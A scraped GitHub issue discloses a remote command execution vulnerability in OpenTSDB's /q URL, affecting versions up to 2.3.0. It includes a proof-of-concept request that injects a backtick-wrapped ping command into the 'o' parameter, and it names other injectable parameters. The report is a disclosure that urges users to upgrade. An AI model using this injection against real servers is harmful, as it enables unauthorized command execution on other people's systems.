You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
payload: take 'o' parameter as example
requeset url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=%60ping%20-c%2010%20127.0.0.1%60&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
response: show ping infomation.
ps: opentsdb-a.b.com is a host which use opentsdb service.
impact:
I have checked the version below 2.3.0, including 2.3.0, 2.2.0, 2.1.4, all are vulnerable. The other versions below 2.3.0 haven't check may probably has the same problem.
The latest version of opentsdb(2.3.1) has fixed the vulnerability.
It's very important for users to know this vulnerability, and update the latest version as soon as possible. Don't let your server device in great danger!
The text was updated successfully, but these errors were encountered:
mikelueng
changed the title
vulnerability! remote command execute in 'q' request method
vulnerability! Remote Command Execute in /q URL.
Jun 29, 2018
mikelueng
changed the title
vulnerability! Remote Command Execute in /q URL.
vul
Jun 29, 2018
mikelueng
changed the title
vul
Many parameters to the /q URL can execute command, including o, key, style, yrange and its json input, y2range and its json input.
Jul 23, 2018
url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
payload: take 'o' parameter as example
requeset url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=%60ping%20-c%2010%20127.0.0.1%60&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
response: show ping infomation.
ps: opentsdb-a.b.com is a host which use opentsdb service.
impact:
It's very important for users to know this vulnerability, and update the latest version as soon as possible. Don't let your server device in great danger!
The text was updated successfully, but these errors were encountered: